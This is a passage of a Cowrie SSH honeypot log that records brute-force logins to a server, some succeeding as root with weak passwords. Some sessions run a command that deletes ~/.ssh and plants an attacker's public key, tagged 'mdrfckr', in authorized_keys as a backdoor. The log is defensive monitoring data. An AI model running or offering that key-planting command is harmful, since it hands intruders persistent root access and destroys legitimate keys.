{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.402335Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.499499Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.500379Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":45274,"dst_ip":"1.2.3.4","dst_port":22,"session":"129768c42134","protocol":"ssh","message":"New connection: 192.210.135.20:45274 (1.2.3.4:22) [session: 129768c42134]","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.568705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.569928Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":39540,"dst_ip":"1.2.3.4","dst_port":22,"session":"662283dd945e","protocol":"ssh","message":"New connection: 51.81.118.153:39540 (1.2.3.4:22) [session: 662283dd945e]","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.595574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.596288Z","src_ip":"51.81.118.153","session":"662283dd945e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.679245Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:02.692345Z","src_ip":"51.81.118.153","session":"662283dd945e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.116277Z","src_ip":"51.81.118.153","session":"662283dd945e"}
{"eventid":"cowrie.login.success","username":"root","password":"QWer12","message":"login attempt [root/QWer12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.161580Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:03.400304Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.400998Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.401901Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.512475Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:04:03.833955Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.834623Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.945835Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:03.946609Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":46722,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfcaca4994f6","protocol":"ssh","message":"New connection: 192.210.135.20:46722 (1.2.3.4:22) [session: bfcaca4994f6]","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.054483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.055364Z","src_ip":"192.210.135.20","session":"bfcaca4994f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.164549Z","src_ip":"192.210.135.20","session":"bfcaca4994f6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.214324Z","src_ip":"51.81.118.153","session":"662283dd945e"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":59334,"dst_ip":"1.2.3.4","dst_port":22,"session":"816b9133aee9","protocol":"ssh","message":"New connection: 51.81.118.153:59334 (1.2.3.4:22) [session: 816b9133aee9]","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.307355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.308279Z","src_ip":"51.81.118.153","session":"816b9133aee9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.405403Z","src_ip":"51.81.118.153","session":"816b9133aee9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.643324Z","src_ip":"192.210.135.20","session":"bfcaca4994f6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.828618Z","src_ip":"51.81.118.153","session":"816b9133aee9"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.926433Z","src_ip":"51.81.118.153","session":"039d444b14f9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:04.927561Z","src_ip":"51.81.118.153","session":"816b9133aee9"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":33622,"dst_ip":"1.2.3.4","dst_port":22,"session":"25f15c553d6d","protocol":"ssh","message":"New connection: 211.22.25.164:33622 (1.2.3.4:22) [session: 25f15c553d6d]","sensor":"my-vps","timestamp":"2025-09-09T04:04:05.741278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:05.742166Z","src_ip":"211.22.25.164","session":"25f15c553d6d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:05.754583Z","src_ip":"192.210.135.20","session":"bfcaca4994f6"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":47606,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e3deb654918","protocol":"ssh","message":"New connection: 192.210.135.20:47606 (1.2.3.4:22) [session: 2e3deb654918]","sensor":"my-vps","timestamp":"2025-09-09T04:04:05.873016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:05.874124Z","src_ip":"192.210.135.20","session":"2e3deb654918"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:05.982872Z","src_ip":"211.22.25.164","session":"25f15c553d6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:05.994303Z","src_ip":"192.210.135.20","session":"2e3deb654918"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:04:06.509550Z","src_ip":"192.210.135.20","session":"2e3deb654918"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:06.629887Z","src_ip":"192.210.135.20","session":"129768c42134"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:06.630755Z","src_ip":"192.210.135.20","session":"2e3deb654918"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"1","message":"login attempt [sonar/1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:04:06.982644Z","src_ip":"211.22.25.164","session":"25f15c553d6d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:08.225183Z","src_ip":"211.22.25.164","session":"25f15c553d6d"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":58292,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb79b40da7e","protocol":"ssh","message":"New connection: 152.32.190.168:58292 (1.2.3.4:22) [session: 5cb79b40da7e]","sensor":"my-vps","timestamp":"2025-09-09T04:04:17.737192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:17.737931Z","src_ip":"152.32.190.168","session":"5cb79b40da7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:04:17.938884Z","src_ip":"152.32.190.168","session":"5cb79b40da7e"}
{"eventid":"cowrie.login.failed","username":"sbserver","password":"sbserver","message":"login attempt [sbserver/sbserver] failed","sensor":"my-vps","timestamp":"2025-09-09T04:04:18.783272Z","src_ip":"152.32.190.168","session":"5cb79b40da7e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:04:19.985791Z","src_ip":"152.32.190.168","session":"5cb79b40da7e"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":41282,"dst_ip":"1.2.3.4","dst_port":22,"session":"c979f51b59a2","protocol":"ssh","message":"New connection: 103.59.95.12:41282 (1.2.3.4:22) [session: c979f51b59a2]","sensor":"my-vps","timestamp":"2025-09-09T04:04:23.018778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:04:23.019760Z","src_ip":"103.59.95.12","session":"c979f51b59a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 